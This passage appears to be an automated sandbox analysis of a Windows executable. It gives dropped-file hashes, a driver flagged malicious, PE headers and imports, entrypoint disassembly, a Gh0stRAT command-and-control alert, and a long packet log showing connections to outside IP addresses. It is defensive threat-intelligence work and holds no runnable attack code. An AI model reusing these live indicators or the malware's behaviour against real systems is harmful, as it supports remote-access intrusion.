                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

                                                                                                              C:\Windows\System32\drivers\189atohci.sys

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):28272
                                                                                                              Entropy (8bit):6.22864467650069
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:N3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/F:NOUkgfdZ9pRyv+uPzCMHo3q4tDghz
                                                                                                              MD5:68C76C673826CA79508DF2A2732F5D30
                                                                                                              SHA1:036D3B3BC235D40E752B80AB7A3BDEE2C5A96A93
                                                                                                              SHA-256:4CBFDAA298A3EDBFAB92C9F89590ED7F190F32954639EB781A08817807A2E845
                                                                                                              SHA-512:0A1026AFC244B91E7E2C32AB94B931634D8AA238069EA3D291F7EB2103223E773F47726ECC4D82A99EE9454114F38AD23286350062BCC42451FCF630DF2A181C
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...............................................g...........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

                                                                                                              C:\xxxx.ini

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:y:y
                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                              Malicious:false
                                                                                                              Preview:..

                                                                                                              \Device\Mup\localhost\pipe\atsvc

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:GLS_BINARY_LSB_FIRST
                                                                                                              Category:dropped
                                                                                                              Size (bytes):298
                                                                                                              Entropy (8bit):4.453229310328559
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ri9Jfnvl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl9/CEv2lWwwAUWKznllF8:ri9J9TwPYtyjtOsXmYwhoiqO
                                                                                                              MD5:DB67B99EBC519DE5995C39A41A271373
                                                                                                              SHA1:0626EAF7617E698C7F0269628FB4FA4A2A7AA54A
                                                                                                              SHA-256:F115D7470EE1DA41E33BAD7152A77CA07476745F3EA6D2627271304116C1FDCD
                                                                                                              SHA-512:042560117976DFC6EDA1388506AA7FD5A3425EE9562EE0F592389F5116FEA1515462B70930EDDF3E4B92092CE6FF8FD8DC4E9181CEB507DEBEC60ED1264ACDC7
                                                                                                              Malicious:false
                                                                                                              Preview:..........:.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............1.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ........).wFw.#.n^.

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Entropy (8bit):0.0837008799425276
                                                                                                              TrID:
                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:2976587-987347589.07.exe
                                                                                                              File size:30'887'936 bytes
                                                                                                              MD5:67ab54b4fc69f4175d217dd57154a27c
                                                                                                              SHA1:f753d5cf1dde05bd2b3417ddfcd12306219fdef3
                                                                                                              SHA256:898349755ad447054ca99dc779c1f5b6c1dd4a7c0dcf1dda1d0e8bbaa6406b36
                                                                                                              SHA512:00b2c238ad1aecd63fb73c7dc6616e198302fd3ee665696e59fe99d189853e115648df3360fe51d0399af304b375811ca546b465504b63d28ce3a2a84a2baf0b
                                                                                                              SSDEEP:3072:U54rQk5rIYRl8YLiVeUeqH+WEwugQyXY2YHFkc1e5evFBDwRucQyTvRBsmuB:q4rUKDLiVeUhEFeYHt1e5evDw/K
                                                                                                              TLSH:BF67AD1B77E070F9E1B69678C8125649D772B8331731AB9F03A44286DF376D18D3AB22
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X.E.X.E.X.E.:.D.X.E.:.D.X.E.:.D"X.E...D.X.E...D.X.E...D.X.E...E.X.E.X.E.X.E5..D.X.E5..D.X.ERich.X.E........PE..d...%IWe...

                                                                                                              File Icon

                                                                                                              Icon Hash:338ed4d4a2726922

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x140004988
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x140000000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x65574925 [Fri Nov 17 11:06:13 2023 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:0f7cdde37f1462484539e0138cfa1fe2

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              dec eax
                                                                                                              sub esp, 28h
                                                                                                              call 00007F69D0700F48h
                                                                                                              dec eax
                                                                                                              add esp, 28h
                                                                                                              jmp 00007F69D06FD1B0h
                                                                                                              int3
                                                                                                              int3
                                                                                                              jmp 00007F69D07033F0h
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              inc eax
                                                                                                              push ebx
                                                                                                              dec eax
                                                                                                              sub esp, 20h
                                                                                                              dec eax
                                                                                                              mov ebx, ecx
                                                                                                              jmp 00007F69D0700AF3h
                                                                                                              dec eax
                                                                                                              mov ecx, ebx
                                                                                                              call 00007F69D07033F6h
                                                                                                              test eax, eax
                                                                                                              jne 00007F69D0700AE4h
                                                                                                              dec eax
                                                                                                              cmp ebx, FFFFFFFFh
                                                                                                              jne 00007F69D0700AD9h
                                                                                                              call 00007F69D0701457h
                                                                                                              jmp 00007F69D0700AD7h
                                                                                                              call 00007F69D0701430h
                                                                                                              dec eax
                                                                                                              mov ecx, ebx
                                                                                                              call 00007F69D070343Ch
                                                                                                              dec eax
                                                                                                              test eax, eax
                                                                                                              je 00007F69D0700AA7h
                                                                                                              dec eax
                                                                                                              add esp, 20h
                                                                                                              pop ebx
                                                                                                              ret
                                                                                                              inc eax
                                                                                                              push ebx
                                                                                                              dec eax
                                                                                                              sub esp, 20h
                                                                                                              dec eax
                                                                                                              mov ebx, ecx
                                                                                                              xor ecx, ecx
                                                                                                              call dword ptr [0000A6CFh]
                                                                                                              dec eax
                                                                                                              mov ecx, ebx
                                                                                                              call dword ptr [0000A6BEh]
                                                                                                              call dword ptr [0000A6C8h]
                                                                                                              dec eax
                                                                                                              mov ecx, eax
                                                                                                              mov edx, C0000409h
                                                                                                              dec eax
                                                                                                              add esp, 20h
                                                                                                              pop ebx
                                                                                                              dec eax
                                                                                                              jmp dword ptr [0000A6BCh]
                                                                                                              dec eax
                                                                                                              mov dword ptr [esp+08h], ecx
                                                                                                              dec eax
                                                                                                              sub esp, 38h
                                                                                                              mov ecx, 00000017h
                                                                                                              call 00007F69D070A02Ch
                                                                                                              test eax, eax
                                                                                                              je 00007F69D0700AD9h
                                                                                                              mov ecx, 00000002h
                                                                                                              int 29h
                                                                                                              dec eax
                                                                                                              lea ecx, dword ptr [00014FF7h]
                                                                                                              call 00007F69D0700B7Fh
                                                                                                              dec eax
                                                                                                              mov eax, dword ptr [esp+38h]
                                                                                                              dec eax
                                                                                                              mov dword ptr [000150DEh], eax
                                                                                                              dec eax
                                                                                                              lea eax, dword ptr [esp+38h]

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [C++] VS2015 UPD3.1 build 24215
                                                                                                              • [LNK] VS2015 UPD3.1 build 24215

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x177340x64.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d760000x4abc.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d740000xcc0.pdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d7b0000x630.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x165d00x54.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x166300x94.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xf0000x2a8.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000xd3500xd4008e41a9c5ed9a34feab50e2f6638c2d76False0.5641030365566038data6.363013225921282IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0xf0000x904e0x9200909112f6547c8c223b9d09d4e73580ceFalse0.4260755565068493data4.707335187064855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x190000x1d5ac680x1d58200ab2455c660e8e10120efea481bddb2e9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .pdata0x1d740000xcc00xe00f0027954b09b335b4fb4c14137971ffdFalse0.44363839285714285data4.49612119040806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .gfids0x1d750000xc40x200bdbf77d4bf01cbf4f15fd100a268f74cFalse0.21875Matlab v4 mat-file (little endian) q, numeric, rows 10, columns 13, imaginary0.9798152519205301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x1d760000x4abc0x4c00c3521f000215b739b35a6f6b2ba17189False0.9590357730263158data7.924423626369639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x1d7b0000x6300x8000c3c3adbfa1d7560de091d1d1029dad6False0.537109375data4.797113422033704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0x1d761180x490dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9856692155499706
                                                                                                              RT_RCDATA0x1d7aa280x7cdataEnglishUnited States0.6370967741935484
                                                                                                              RT_RCDATA0x1d7aaa40x2dataEnglishUnited States5.0
                                                                                                              RT_GROUP_ICON0x1d7aaa80x14dataEnglishUnited States1.05

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              KERNEL32.dllGetFileAttributesW, CloseHandle, GetLastError, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetModuleFileNameW, LoadResource, LockResource, SizeofResource, LoadLibraryW, FindResourceW, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, VirtualAlloc
                                                                                                              USER32.dllwsprintfW, MessageBoxW
                                                                                                              SHELL32.dllShellExecuteExW
                                                                                                              SHLWAPI.dllPathCombineW, PathRemoveFileSpecW, PathCanonicalizeW

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-11T04:43:28.898619+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.8499888.210.66.1838917TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 11, 2025 04:42:15.932701111 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:15.932739019 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:15.932827950 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:15.953391075 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:15.953407049 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.199477911 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.199558020 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.200570107 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.200619936 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.277070999 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.277077913 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.277618885 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.277710915 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.279473066 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.323319912 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.600915909 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.601063967 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.601083040 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.601102114 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.601162910 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.601162910 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.611119032 CET49708443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.611130953 CET4434970839.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.733340979 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.733370066 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:17.733454943 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.733740091 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:17.733752966 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:18.985896111 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:18.986052036 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:18.986860991 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:18.986875057 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:18.987054110 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:18.987060070 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.312122107 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.312180996 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.312293053 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.312552929 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.312588930 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.312644958 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.312659979 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.315160990 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.315259933 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.317265987 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.317336082 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.402544022 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.402642965 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.402679920 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.402739048 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.403367043 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.403443098 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.403464079 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.403527975 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.404134035 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.404196978 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.404880047 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.404944897 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.406251907 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.406320095 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.408193111 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.408272028 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.408281088 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.408308983 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.408339977 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.408365011 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.410209894 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.410288095 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.493568897 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.493688107 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.493695974 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.493726015 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.493774891 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.493788958 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.493824005 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.493880987 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.493940115 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.493998051 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.494239092 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.494306087 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.494546890 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.494621992 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.494745970 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.494807959 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.494837999 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.494898081 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.495371103 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.495444059 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.495645046 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.495716095 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.495745897 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.495805979 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.496145010 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.496215105 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.497056007 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.497128963 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.499161959 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.499233007 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.501169920 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.501256943 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.501271963 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.501286983 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.501306057 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.501329899 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.584615946 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.584698915 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.584764957 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.584822893 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.584855080 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.584913015 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.584953070 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.585055113 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.585069895 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.585123062 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.585134983 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.585186958 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.586246014 CET49709443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.586265087 CET4434970939.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.630335093 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.630373001 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:19.630471945 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.630711079 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:19.630728960 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:20.866604090 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:20.866823912 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:20.867197990 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:20.867218971 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:20.867397070 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:20.867408991 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.198481083 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.198548079 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.198662996 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.198765993 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.198765993 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.198820114 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.199002981 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.199002981 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.200359106 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.200459003 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.204380989 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.204495907 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.285290956 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.285434961 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.285547018 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.285556078 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.285556078 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.285584927 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.286202908 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.286417007 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.286511898 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.286555052 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.286685944 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.287269115 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.287341118 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.289027929 CET4434971039.103.20.105192.168.2.8
